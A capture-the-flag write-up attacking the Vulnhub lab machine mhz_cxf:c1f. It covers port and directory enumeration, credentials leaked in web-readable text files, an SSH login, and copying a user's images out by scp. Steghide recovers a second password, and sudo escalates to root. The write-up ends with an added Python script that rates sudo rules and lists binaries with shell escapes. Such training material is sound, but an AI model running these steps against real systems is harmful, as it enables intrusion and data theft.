[VLN] mhz_cxf:c1f

Today we are going to hack the Vulnhub machine called mhz_cxf: c1f. You can download it from the following link: https://www.vulnhub.com/entry/mhz_cxf-c1f,471/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -A -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 10:51 CEST
    Nmap scan report for mhz_c1f.home (
    Host is up (0.00045s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
    |   256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
    |_  256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: 400 Bad Request
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds
    Only two services are exposed: SSH and an Apache web server, so the web server is where enumeration continues.
    Let's see whether there is anything interesting on the Apache server, brute-forcing paths with gobuster (big.txt wordlist, with the php and txt extensions appended).
    sml@Cassandra:~$ gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -x php,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,txt
    [+] Timeout:        10s
    ===============================================================
    2020/05/02 10:52:31 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htaccess.php (Status: 403)
    /.htaccess.txt (Status: 403)
    /.htpasswd (Status: 403)
    /.htpasswd.txt (Status: 403)
    /.htpasswd.php (Status: 403)
    /notes.txt (Status: 200)
    /server-status (Status: 403)
    ===============================================================
    2020/05/02 10:52:41 Finished
    ===============================================================
    The 403s are just Apache protecting its own dotfiles and server-status; the one hit that matters is a file called notes.txt, so let's look at it. Its content is:
    1- i should finish my second lab
    2- i should delete the remb.txt file and remb2.txt
    The note names two files the author meant to delete but never did, so we request remb.txt from the web server. Its content is:
    first_stage:flagitifyoucan1234
    This looks like a user:password pair (we will come back to remb2.txt later).
  • Low Shell
  • We use the credentials obtained from the remb.txt file to log in over ssh.
    sml@Cassandra:~$ ssh first_stage@
    first_stage@'s password:
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

      System information as of Sat May  2 08:54:06 UTC 2020

      System load:  0.28               Processes:             97
      Usage of /:   45.1% of 9.78GB    Users logged in:       0
      Memory usage: 20%                IP address for enp0s3:
      Swap usage:   0%

    28 packages can be updated.
    0 updates are security updates.

    *** System restart required ***
    Last login: Fri Apr 24 18:18:07 2020 from
    $
  • user.txt
  • first_stage@mhz_c1f:~$ pwd
    /home/first_stage
    first_stage@mhz_c1f:~$ ls
    user.txt
    first_stage@mhz_c1f:~$ cat user.txt
    HEEEEEY , you did it that's amazing , good job man so just keep it up and get the root bcz i hate low privileges ;) #mhz_cyber
  • Post Exploitation
  • After looking around the system, there is a directory called Paintings in the home directory of the other user, mhz_c1f, that may contain hidden data, so I copy it over to my machine to see whether steghide extracts anything from the images...
    first_stage@mhz_c1f:~$ cd /home/mhz_c1f
    first_stage@mhz_c1f:/home/mhz_c1f$ scp -r Paintings/ sml@
    sml@'s password:
    Russian beauty.jpeg            100%  507KB  44.4MB/s   00:00
    19th century American.jpeg     100%  437KB  42.1MB/s   00:00
    spinning the wool.jpeg         100%  905KB  61.7MB/s   00:00
    Frank McCarthy.jpeg            100%  348KB  52.8MB/s   00:00
    sml@Cassandra:~/vulnhub/mhz/Paintings$ steghide extract -sf spinning\ the\ wool.jpeg
    Enter passphrase:
    wrote extracted data to "remb2.txt".
    sml@Cassandra:~/vulnhub/mhz/Paintings$ cat remb2.txt
    ooh , i know should delete this , but i cant' remember it screw me
    mhz_c1f:1@ec1f
    We were able to extract the file remb2.txt (the second file mentioned in notes.txt) from spinning the wool.jpeg; the passphrase is empty, so just press Enter at the prompt. It gives us the credentials for mhz_c1f.
  • Privilege Escalation
  • We switch to mhz_c1f with the password from remb2.txt and check what sudo allows that user to run.
    first_stage@mhz_c1f:/home/mhz_c1f$ su mhz_c1f
    Password:
    mhz_c1f@mhz_c1f:~$ sudo -l
    [sudo] password for mhz_c1f:
    Matching Defaults entries for mhz_c1f on mhz_c1f:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User mhz_c1f may run the following commands on mhz_c1f:
        (ALL : ALL) ALL
    mhz_c1f@mhz_c1f:~$ sudo su
    root@mhz_c1f:/home/mhz_c1f#
    The rule (ALL : ALL) ALL means mhz_c1f may run any command as any user and any group, so no trick is needed: sudo su (or sudo -i) with the user's own password drops us straight into a root shell.
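    Reading sudo -l output by eye is fine on one box, but on an engagement you collect it from many hosts. As an added example (not part of the original writeup or the machine's tooling), the following Python script parses sudo -l output in the format shown above and ranks each rule by how directly it leads to root. The embedded sample is constructed: it contains the real rule from this machine plus two assumed rules that are not on the box, added only to exercise the other classifications; the SHELL_ESCAPES set is likewise an assumed subset of binaries with well-known shell escapes.

```python
"""Classify the rules in `sudo -l` output by how directly they lead to root.

Added example for this writeup, not the machine's own tooling. Rule lines
follow sudoers syntax: "(runas_user[ : runas_group]) [TAG: ...] command".
"""
import os
import re

# Constructed sample: the rule seen on mhz_c1f plus two ASSUMED rules that
# are not on the box, present only to exercise the other severities.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mhz_c1f on mhz_c1f:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mhz_c1f may run the following commands on mhz_c1f:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/vim
    (www-data) /usr/bin/systemctl status apache2
"""

# One rule line: "(runas[ : group]) [TAG: TAG: ...] command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)

# Binaries that spawn a shell when run as root (assumed subset, in the
# spirit of GTFOBins; extend for your own checks).
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "find", "awk",
                 "python", "python3", "perl", "env", "bash", "sh", "zsh"}


def parse_sudo_l(text):
    """Return the rule lines that follow the 'User X may run ...' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({"runas": m.group("runas").strip(),
                      "tags": tags,
                      "cmd": m.group("cmd").strip()})
    return rules


def assess(rule):
    """Return (severity, reason) for one parsed rule."""
    runas_user = rule["runas"].split(":")[0].strip()
    as_root = runas_user in ("ALL", "root")
    nopasswd = "NOPASSWD" in rule["tags"]
    cmd = rule["cmd"]
    if cmd == "ALL" and as_root:
        how = "unrestricted: sudo su / sudo -i gives a root shell"
        if nopasswd:
            how += " without a password"
        return "critical", how
    binary = os.path.basename(cmd.split()[0])
    if as_root and binary in SHELL_ESCAPES:
        return "high", f"{binary} as root has a known shell escape"
    if nopasswd:
        return "medium", "NOPASSWD rule; inspect the target for escapes or writable paths"
    return "low", "restricted command; check its arguments and file permissions"


def report(text):
    """Parse and classify every rule; returns a list of (severity, cmd, reason)."""
    out = []
    for rule in parse_sudo_l(text):
        severity, reason = assess(rule)
        out.append((severity, rule["cmd"], reason))
    return out


if __name__ == "__main__":
    for severity, cmd, reason in report(SAMPLE_SUDO_L):
        print(f"[{severity:8}] {cmd:40} {reason}")
```

    Run it as-is to see the three classifications, or feed it the captured output of sudo -l from any host via report(). The parser deliberately starts only after the "User ... may run" header so that the secure_path line and other Defaults never get mistaken for rules.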
  • root.txt
  • Finally, we read the root flag. Note that it is a dot-file in /root, so a plain ls would not show it; use ls -la.
    root@mhz_c1f:~# cat .root.txt
    OwO HACKER MAN :D
    Well done sir , you have successfully got the root flag.
    I hope you enjoyed in this mission.
    #mhz_cyber
  • End
  • And with that we are root on the machine :)